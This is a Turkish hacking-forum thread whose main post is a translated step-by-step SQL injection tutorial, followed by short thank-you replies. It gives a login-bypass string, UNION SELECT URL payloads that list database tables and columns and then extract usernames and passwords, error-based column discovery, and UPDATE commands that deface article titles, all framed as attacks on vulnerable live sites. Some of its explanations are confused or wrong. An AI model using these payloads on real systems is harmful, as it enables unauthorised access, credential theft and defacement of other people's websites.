Sql derslerı -1-

CaLLouS

Kıdemli Üye
30 Ocak 2009
3,025
0
SQL Injection Siradisi bir yontem ve temel bilgiler;


Diğerlerine göre kısmen alışılmamış SQL injection’ı anlatan bu belge, başlıktan da anlaşılacağı üzere, aslında diğer SQL incjection’lara benzemeyen, yani sıra dışı injection’lardan bahsetmektedir. Bu makalenin yazılma amacı sadece konu hakkında kapsamlı belge olmasının ve öğrenmeye destek olmasının yanı sıra, aynı zamanda internet üzerinde gerçek kullanımlı SQL injection hakkında araştırma yapanlara yardımcı olmaktır. Geçmişte okuduğum ve şuan da okumakta olduğum SQL injection rehberlerinin hepsi olmasa da çoğunda şuna rastladım ki; bunların hepsi baskı hatalarıyla, gramatik yapıda ekran hatalarıyla, yazarın bile tam anlamadığı karışık, karmaşık kelimelerle dolu. Ya da bir web sitesine sql injection uygularken gerekli olabilecek belli teknikleri içermeyen belgeler. Bu tarz belgeleri okurken yorum yapmadan anlamaya çalışmak aslında aldatıcı olabilir. Neyse ki bu bildiğiniz sıradan SQL injection belgelerinden değil ve şunu fark ettim ki siz ve SQL injection’ın nasıl yapıldığını anlama arasında başka bir basamak yok. Bu okuması gayet kolay olan belgeyi okurken ve uygularken keyif alacağınızı umuyorum.
SQL ve kullanımı
• SQL bir bilgisayar dilidir
• Web sayfaları yazmaya yarar.
• Açılımı "Yapılandırılmış Sorgu Dili " dır.
• SQL bir serverdaki web sitesine bilgi eklemek, göstermek ve depolamak için kullanılır.
Tablolar

Bir SQL veritabanında bilgilerin saklandığı tablolar vardır.
Tablolar web sitesindeki envai çeşit bilgiyi saklayabilirler (kullanıcı adları, şifreler, adresler vs.)
Tablolarda bilgilerin saklandığı sütunlar vardır.
Her tablo ve sütunun bir ismi vardır.
SQL enjeksiyon bu tabloların bir ya da daha fazlasında değişiklik yapma manasına gelir.
Aşağıda örnek bir tablo var.
Tablonun ismi "Siteler", sütunların ismi "İLK" ve "İKİNCİ". Bu tablo site isimlerinin saklandığı yerdir. İki kayıt mevcut su an için. "Cyber user" ve "Cyber deneme"
Siteler

| İLK | İKİNCİ |

| Cyber | user |

| Cyber | deneme |
Açıklar

SQL Enjeksiyon açıkları iki ana biçim üzerinde kullanılır.
Her iki biçim de bir web sitesine SQL kodu enjekte edilmesine yol açar.
"SQL kodu enjekte etmek" demek "SQL kodu yazmak" demektir
Bir siteye SQL enjekte ettiğinde site, sen ondan ne yapmasını istersen onu yapacaktır ya da artık amacın her neyse ona ulaşabileceksin.
-(1) Forma enjekte edilmesi. Giriş sayfasındaki kullanıcı adı ve şifre kutuları gibi

-(2) URL’ ye enjekte edilmesi. www.Cyber-user.org/news.asp?ArticleID=10 gibisinden.
Amaçlar
Kodu enjekte eden olarak amacın SQL sunucusunun hakkından gelmek, o servera sızabilmektir.
Servera sızarak sitenin tablolarındaki bilgileri ekranında görebileceksin.
Tablolara bilgi ekleyip çıkarabileceksin
Ek olarak, belli güvenlik duvarlarını, engellerini (log in olma gibi) asıl kullanıcı adı ve şifresi olmadan aşabileceksin.
SQL nasıl Çalışır?

Enjekte yapmadan önce SQL in nasıl çalıştığını anlaman gerekli
Kullanıcı adı ve şifresiyle siteye bağlandığında, kullanıcı adin ve şifren sitedeki üye tablosunda saklanacaktır
Kullanıcı adı ve şifre ayrı sütunlarda saklanır.
Kullanıcı adı ve şifresiyle siteye girdiğinde, giriş sayfası kullanıcı adı ve şifresinin olduğu bir satır arayacaktır.
Giriş formu sağladığın koşulları alır ve bu koşulları karşılayan sırayı üye tablosundan araştırır.
Eğer ki satır ayni kullanıcı adi ve şifresini içerirse hesabına girişine izin verilir
Eğer olurda bu satır bulunamazsa, giriş sayfası yazdığın kullanıcı adı ve şifresinin bulunduğu satırın olmadığını söyleyecektir.
SQL ayrıca bir web sitesindeki bilgileri de gösterir.
Eğer site de bir haber kısmı varsa, bütün konu isimlerinin bulunduğu bir SQL tablosu da olabilir
Genelde bu konu isimleri numarayla belirtilir
Konu üzerindeki linke tıkladığında, genelde konu numaralarını bulunduğun sayfanın URL çubuğunda görürsün.
Örneğin, face=times new roman color=#0000ff www.Cyber-user.org/news.asp?ArticleID=10 gibisinden bir linke tıkladığınızda, bu link, siteye konu isimlerinin saklandığı tabloya bakıp, ’ArticleID’ si 10 olan konuya bakmasını söyleyecektir.
Web sitesi tablodaki bu sütunu bulduğunda, aynı satırda ’Konu’ isminde bir sütun arayabilir ve bu değeri konunun başlığında gösterir.
Komutlar nedir ve ne ararlar?

Komut denen belli kelimeleri kodlayarak, SQL sunucusuna (web sitesine) belli bir tabloya, sütuna ve satıra ne yapmak istediğiniz söyleyebileceksiniz
Komut içerisine, ne yapmak istediğini belirtmen gerekecek.
Bir linke enjekte edeceksen, isteğini URL deki ’=’ işaretinden sonra yazman gerekli
Bir form a enjekte edeceksen, giriş formu gibi, istediklerini normalde isim ve şifrelerini yazdığın kutulara yazmalısın
Web sitesi ne yazdığını ve ne istediğini okuyacak ve ne istersen yapacaktır.
Olanaklar sonsuzdur; bazı örnekler okur, değiştirir, kullanıcı isimleri ve şifreleri ekler ve sayfadaki kelimeleri değiştirebilir.
Tanıtma ve Söz Dizimi

Komutlarına yazım tarzına sözdizimi (syntax) denir.
SQL server’in seni anlayabilmesi ve istediğini yapabilmesi için sağ sözdizimini kullanmalısın.
Aşağıdaki kodlarla kendini tanıt ve bu belge boyunca ve normalde SQL enjekte ederken kullan
Doğru sözdizimi hakkında endişelenmene gerek yok. Öğrenmek için buradasın ve en sonunda onu hafızanda tutabileceksin. Tabi bunun için pratik yapman ve örnekleri iyice sindirmen gerekecek.
İlerlerken daha önce öğrendiklerini hatırlamak senin yararına olacaktır
Ekranda dili göreceksin sadece kelimeleri değil
Göreceğin ve kullanacağın kodların tamamı listelenmiş değil.
Daha sonraları bunları göreceksin (kafa karıştırıcı olanları), ne yaptıklarını ve nasıl kullanıldıklarını bileceksin fakat muhtemelen neden çalıştıklarını anlayamayacaksın.
Kolaylık açısından aklında kalsın diye, bu komutlar ve kullanımları aşağıdaki listeden çıkarılmıştır.

Hızlı Kod Kullanım Rehberi
ORDER BY - Web sitesine baktığın sayfadaki hangi sütunu göstereceğini söyler.
SELECT - Tablodaki belli bir bilgiyi seçer
UPTADE - Tablodaki sütunda var olan bilgiyi değiştirir
AND - Komutun çalışması için her iki durumun da doğruluğu sağlanmalıdır.
OR - Komutun çalışması için tek durumun doğru olması gerekir.
-- (iki çizgi) - Komutlarını sonlandırır.
+ - Boşluk yerine artı işaretini kullan




Form Injection
En kolay SQL enjekte çeşidi "izin geçişi" dır. (authorization bypass)
Bu enjekte SQL in, web sitesindeki kullanıcı adını ve şifreni girdiğin kutulara enjekte edilmesini sağlar, mesela bir giriş sayfası
"SQL nasıl çalışır" başlığından da hatırlayacaksınız, giriş sayfaları; girdiğiniz bilginin doğru koşulu sağlayıp sağlamadığını üye tablosundaki satırlara bakarak bulur
Web sitesini; bizim yazdığımızın doğru kullanıcı adı ve şifresini sağladığını sanmasını ve en azından bir satırı bize göstermesini sağlamak için kandırmalıyız
Kullanıcı adı ve şifre kutularının her biri görünmeyen bir tırnak işareti tarafından çevrelenmiştir
Form sunulduğunda; tek tırnak işaretiyle çevrelenen her neyse, iste o web sitesinin, üye tablosunda aradığı şeydir.
Bu yöntemde, eğer açık tırnak işareti kullanırsanız, onu ya kapatmalısınız ya her zaman hata alırsınız
Örneğin, eğer z’ yazarsanız hata alırsınız, çünkü tırnak açılmış lakin kapatılmamıştır.
Şu unutulmamalıdır ki, her zaman görünmeyen iki tane tırnak işareti zaten yazdığın her kutuyu çevreler.
Peki ya sunu yazarsak: z’ OR ’x’=’x
Basitçe İngilizcede, SQL’i bir kenara bırakalım, z’ OR ’z’=’z servera herhangi bi satırda kullanıcı adı olarak ’z’ ya da ’x’ harfiyle ayni ’x’ harfi var mı yok mu aramasını söyler
Bu gayet doğru bir ifadedir çünkü her satırda, tabloda, sütunda ve dilde x harfi x harfiyle aynidir ( :
SQL servera göre bu geçerli bir kullanıcı adıdır çünkü x her satırda x ile aynidir
Oldukça garip ama SQL sunucu bizim üye tablosunda olup olmadığımızı öğrenmek için ne istediyse verdik ve bingo
Bunu hem kullanıcı adı hem de şifre için yaparsanız, alnınızın teriyle web sitesine giriş yapmış olursunuz.




- Şekil C -

Username: ’ | Cyber | ’ (’Cyber’ ismi üye tablosunda aranacaktır)



- Şekil D -



Username: ’ | z’ | ’


Bu şekilde yazarsak üye tablosundan ’z’’ kelimesi araştırılacaktır
Bu bir problem oluşturacaktır, çünkü SQL server açık olan bir tırnak işaretinin kapatılmasını bekleyecektir. Ama beklediğini bulamayınca tabi error verecek.






- Şekil E -

Username: ’ | z’ OR ’x’=’x | ’


Şimdi burada sizce ne arayacaktır? Parantez içine yazıyorum, karışmasın ( ’z’ OR ’x’=’x’ )
Burada o basta ve sondaki tırnak işaretleri nerden geldi, hani demiştik ya kutucukların dışında bizim görmediğimiz tırnak işareti var diye. İşte oradan geldi.
Her açılmış tırnak işareti kapatılmış böylelikle bu istek hata vermeyecektir
’z’ ismi tabloda yer almasa da ’x’ her zaman ’x’ e eşit olacağından problem yaşamayacaksınız ( :






Bilgi Şeması
"BİLGİ_ŞEMASI" bir sitedeki her tablo ve sütunun isminin tutulduğu yerdir.
Her SQL sunucu da bir "INFIRMATION_SCHEMA" vardır ve ismi asla değişmez.
Diğer bütün tabloları içinde barındıran "INFORMATION_SCHEMA” "INFORMATION_SCHEMA.TABLES olarak adlandırılır.
"INFORMATION_SCHEMA.TABLES tablosunun içindeki bilgileri barındıran sütuna “table_name” denir.
Diğer bütün sütunları da içinde barındıran "INFORMATION_SCHEMA” , "INFORMATION_SCHEMA.COLUMNS olarak adlandırılır.
"INFORMATION_SCHEMA.COLUMNS sütununun içindeki bilgileri barındıran sütuna “column_name” denir.






URL Enjeksiyon
İyi haber; Asıl gırgır şimdi başlıyor!
Burada ise tablo ve sütunların isimlerini bularak, tablolarda saklanan bilgilerin nasıl okunduğunu ve değiştirdiğini öğreneceğiz.
Kötü haber; yukarıda bahsetmiş olduğumuz “Komutlar” bölümünü iyi öğrenmiş olmanız gerekir,(özellikle b bölümünü), bu bölümü yeniden incelemek zor olmasa gerek.
Web sayfasındaki herhangi bir linkte “=” işaretine rastlayabilirsiniz.
Bu sitede SQL Enjeksiyonu uygulayabilmek için, eşittir işaretinden sonra komutları yazmanız gerekir.
Şimdi eşittir işaretinden sonra komutları yazmaya başlayalım ve tarayıcımızdan, sanki yeni bir siteye giriyormuşuz gibi git butonuna basarak devam edelim.
Ne yapmanız gerektiğini anlamanın en basit yolu, örnek bir saldırıyı adım adım incelemektir.
Saldırı örneklerimizi uygulayacağımız örnek URL’ de face=times new roman www.site.com/news.asp?ArticleID=10 olsun.
Aşağıdaki diğer örneklerde de, açık bulunan sitelerde gerçekleştirebileceğimiz iki genel saldırı çeşidini inceleyeceğiz.
 

CaLLouS

Kıdemli Üye
30 Ocak 2009
3,025
0
Saldırı 1

Hedef: Bir kullanıcı adı ve şifre edinin

Açığın bulunduğu URL: www.site.com/news.asp?ArticleID=10



1.ADIM: Linkte açık olup olmadığını belirleyin.



a. face=times new roman www.site.com/news.asp?ArticleID=10+AND+1=0-


Komut Çevirisi: Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster.
Bu durumda, “AND” komutu makalenin görüntülenmek için uygun olduğu anlamına gelir, makale 10 bulunmalı ve 1’de 0’a eşit olmalı.
Bu da makalenin yüklenmemesine neden olur çünkü 1, 0’a benzer degildir.






b. www.site.com/news.asp?ArticleID=10+AND+1=1-
Komutun tercümesi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster.
Makale görüntülenebilmeli, çünkü 10 numaralı makale mevcut ve 1’de 0’a eşit.
İstediğinizde makale yüklendiğinden ve istemediğinizde de yüklenmediğinden dolayı komutlarımızın buradan komutların çalışıyor olduğunu anlayabiliriz. Bu da linkin açık olduğu ve devam edebileceğimiz anlamına gelir.






ADIM 2: Sayfada gösterilen toplam sütun sayısını bulmak



a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1-
“ORDER BY 1”( bir numaralı sütunun bulunduğu yer) sayfaya 1 numaralı sütunu ilk sayfa içerisinde göstermesini söyler.
“ORDER BY 2” 2 numaralı sütunu ilk sayfada gösterir.






b. 2. Adımın a şıkkını tekrar edelim. Numaraları her defasında birer birer artırıyoruz ta ki; bir hata mesajı alana kadar.



i. Hata mesajı aldığımızda duruyoruz. Ulastığımız rakamdan bir çıkarıyorz ve kaydediyoruz.

- Örnek olarak 4 rakamına ulaştığımızda bir hata mesajı aldık

( www.site.com/news.asp?ArticleID=10+ORDER+BY+4--), 3’ü elde etmek için 4’ten 1 çıkarıyoruz.



ii. Buradan sayfada üç sütun bulunduğunu anlayabiliriz.



ADIM 3: Tablo Adlarının Görüntülenmesi



*3 ve 4 numaralı adımlara referans olarak “BİLGİ ŞEMASI” bölümünü kullanabilirsiniz.



a. www.site.com/news.asp?ArticleID=

- 1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-

-Komut Anımsatıcı: “SELECT” web sitesine sizin belirtmiş olduğunuz tablodan yine sizin belirttiğiniz bilgileri görüntülemesini söyler.



Cyber-User TIM | Haberci Group’dan Not:

Alttaki kısımda negative one derken neyi kastediyor açıkça belirtmemiş. –1 mi yoksa -10 mı diye. Ben her iki şekilde de yazıyorum. Siz uzmanlar konuya daha vakıf olduğunuz için hangisinin doğru olduğunu daha iyi anlarsınız

Not: Orijinal makale numarasını (10) eksi 1’le değiştirmelisiniz.

Orijinal makale numarasını (10) -10 ile değiştirmelisiniz.



Not: Adım 2’nin b şıkkında ulaştığımız son rakam, üstte yazmış olduğumuz komuta, 1’den geldiği son rakama kadar sıralanarak ve virgüllerle ayrılarak yazılır.


Şu anda yukarıdaki komutta sıralamış olduğunuz web sayfasında herhangi bir yerde gösterilen numaraları, görebilirsiniz.
Şu andan itibaren, eğer sayfada görüntülenebiliyorsa, URL içinde sadece numaralı değiştirebilirsiniz.






b. www.site.com/news.asp?ArticleID=


1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES-
Hatırlatıcı: sayfada tablo adlarıyla birlikte gösterilen herhangi bir rakamı değiştirebilirsiniz.
Komutun Tercümesi: Tablo isimlerini göster.
Sayfada rakamlardan herhangi bir tanesi yerine tablo adı gösteriliyor olmalıdır.






ADIM 4: Hedef Tablo İsimlerini Bulmak



a. www.site.com/news.asp?ArticleID=

-1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+

WHERE+table_name>’displayed_table’-


Sayfada ilk görüntülenen tek sayılı tablo isimi bizim aradığımız olan değildir, bizim asıl aradığımız içinde kullanıcı isimleri ve şifrelerin bulunduğu tablolardır.
Tablolar listesini tespit edip, doğru tabloyu bulabilmek için “TABLES” kısmını sonuna "+WHERE+table_name>’displayed_table’ " bölümünü ekleyin.
Komutun Tercümesi: Listedeki ‘displayed_table’ den sonraki tablonun ismini görüntüle.






b. Adım 4’ün a şıkkını uygun bir üye tablosu ismi görüntülene kadar tekrarlıyorz.

-Saldırı için diyelim ki “UserAccounts” adında bir tablo bulduk.



c. 4. Adımın b şıkkından tablo ismini hatırlayın eğer gerekiyorsa bir yere not alın.



ADIM 5: Sütun İsimlerini Görüntülemek



a. www.site.com/news.asp?ArticleID=
1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=’UserAccounts’—
Komutun Tercümesi: “UserAccounts” tablosundaki sütunların isimlerini görüntüle.
Şimdi, tablo ismi yerine, görüntülenen “UserAccounts” tablosundaki sütun isimlerini göreceksiniz.






ADIM 6: Hedef Sütunları Bulmak



a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,column_

name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=’User

Accounts’+AND+column_name>’displayed_column’-


4. Adımda olduğu gibi burada da işinize yarayacak sütunların isimlerini bulmanız gerekmektedir.
Eğer kullanıcı adı ve şifreleri arıyorsanız; username, password, user,pass, login_name gibi isimlerle adlandırılmış sütunları bulmayı denemelisiniz.
Komutun Tercümesi: Listedeki ’displayed_column.’ Dan sonraki diğer sütunun ismini görüntüle.






b. 6.Adımın a şıkkındakileri doğru sütunu bulana kadar tekrarlayın.

- Örnek saldırımız için, “username” ve “password” adını taşıyan sütunları bulduğumuzu düşünücez.



c. Adım 6’nın b şıkkını hatırlayıp, gerekiyorsa onları bir yere not alıcaz.



ADIM 7: Kayıtları Görüntülemek

* Bu adım için artık elimizde, bir yere not ettiğiniz uygun tablo ve sütun adlarımız mevcut.



Tablo Adı: “UserAccounts”

Sütun Adı: “username” ve “password”



a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,username,3+

FROM+UserAccounts--


Komutun Tercümesi: “UserAccounts” tablosundaki “username” sütununda bulunan kayıtları görüntüle.
Diyelim ki sayfa kullanıcı adı olarak “Adam”






b. www.site.com/news.asp?ArticleID=
1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE +username=’Adam’--
Komutun Tercümesi: UserAccounts Tablosundaki “Adam” nickinin kullandığı şifreyi görüntüle.
Bu farazi saldırımızda diyelim ki sayfa “neo” diye bir şifre gösterdi.






c. “Adam” nickinin kullandığı “neo” şifresini buldunuz.

Kullanıcı adı: “Adam”

Şifre: “neo”



Evet ilk SQL Injection saldırınızı gerçekleştirdiniz.



Saldırı 2



HEDEF: Sayfada Gösterilen Metni Değiştirmek

Açık URL: www.site.com/news.asp?ArticleID=10



ADIM 1: Tablo ve Sütun İsimlerini Bulmak



a. www.site.com/news.asp?ArticleID=10+HAVING+1=1-
Bu komut ("HAVING+1=1") bir hata mesajının verilmesine neden olacaktır.
Hata mesajıda; "Column ’news.id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause." Yani; seçili listedeki ‘news.id’ sütunu geçerli değildir çünkü kümeleme fonksiyonuna dahil edilmemiş ve GROUP BY maddesi yok
Yalnız burada hata mesajına dikkat edin tablo ve sütun isimlerini açığa çıkarıyor.
Hata mesajındaki “news.id” , “news” tablosunda “id” isimli bir sütun olduğu anlamına gelmektedir.






ADIM 2: İşe Yarar Bir Sütun Adı Bulmak

a. www.site.com/news.asp?ArticleID=10+GROUP+BY+id+HAVING+1=1-
Tabloda, bir sonraki sütunun ismini bulabilmek için “HAVING” komutundan önce "GROUP+BY+first_column_name_displayed" kısmını eklemelisiniz.
Bu komutta ise, "first_column_name_displayed" yani “görüntülenen_ilk_sütun_adı” “id” dir.
Bu komut başka bir hata mesajı oluşturur, bu kez de “news.id” hata mesajındaki “id” kısmı değişecektir, ve bu da diğer sütunun ismidir.
Farzı mahal, bu defada hata mesajını “news.release” şeklinde vermiş olsun.






b. www.site.com/news.asp?ArticleID=10+GROUP+BY+id,release+HAVING+1=1-
Sütun isimlerini görüntülemeye devam etmek için, hata mesajındaki sütun ismini bir virgül koyarak ekleyin.
Virgülle ayrılmış listeye virgülleri ve mevcut hata mesajındaki sütun isimlerini eklemeye devam edin.
Şimdi de diyelim ki hata mesajı bize “title” ismindeki sütunu versin (“news.title”).
Makale başlıkları muhtemelen bu sütunda saklanmakta ve sayfada gösterilmekte.
Eğer “title” sütunundaki makale başlıkları kısmını değiştirebilirseniz, sitede son gösterilenleri de değiştirebilirsiniz.






ADIM 3: Sayfayı Değiştirmek



a. www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’sql injected’-


Bu news tablosundaki tüm başlıkları “sql injected” şeklinde değiştirecektir.
Web sitesinin kendi orijinal makale başlıklarını değiştirmek yerine, bütün başlıklarda “sql injected” yazacaktır.
Yalnız buraya dikkat. Bu hareket bütün başlıkları değiştirecektir. Eğere sadece belirli bir makalenin başlığını değiştirmek istiyorsanız, o zaman bu bölümdeki 3. Adımın b şıkkına geçin.






b. www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’sql

injected’+WHERE+id=10—


Bu komut ise sadece 10 numaralı makalenin başlığını “sql injected” şeklinde değiştirecektir.
Farklı bir makalenin başlığını değiştirmek için ,id=10 kısmındaki 10 rakamını başka bir numara ile değiştirin.
Örnek olarak; id=10’u id=8’ e çevirebilirsiniz. Yalnız burada değişikliği görebilmek için, " www.site.com/news.asp?ArticleID=8" yazıp enter’lemeniz gerekecektir.




Tebrikler! SQL Enjeksiyonun temelini öğrendiniz. Umarım bu sayfadan bir şeyler öğrendiniz ve daha fazlasını öğrenmek için de istekli olursunuz. Öğrenecek olduğunuz şeyler tabiî ki burada bitmiyor. Keşfedeceksiniz, merakınız artacak, sorular soracaksınız, hatta bazen kaçınılmaz bir şekilde hüsrana uğradığınızı bile hissedeceksiniz. Kolaylıkla tükendiğiniz ve cesaretinizin kırıldığı da olabilir, ancak bırakmak asla sorularınızın cevaplarına bir çözüm olmayacaktır. Teşebbüs etmek, denemek üstesinden gelmek demektir. Asla isteklerinizden bir şeylerin azalmasına müsaade etmeyin, ne olursa olsun.
AR-GE Developer (Proje) Grubu Döküman Arşivi
Çeviri Destek : Haberciler Lisan-ı aşna TIM

ALıntıdır //
 

RDVN_20

Yeni üye
16 Ağu 2009
33
0
formlarda okuduğum en güzel ve en acıklayıcı sql injection gercekten çok yaralı oldu helal olsun teşekkürler bunu direk olarak bilgisayarıma copy/paste yapıyorum harikaydı
 

RDVN_20

Yeni üye
16 Ağu 2009
33
0
Dostum 2. Yi ne zaman acıyorsun veya nereden alıntı yaptın pm atarsan ii olur reklama girmesin..:s
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.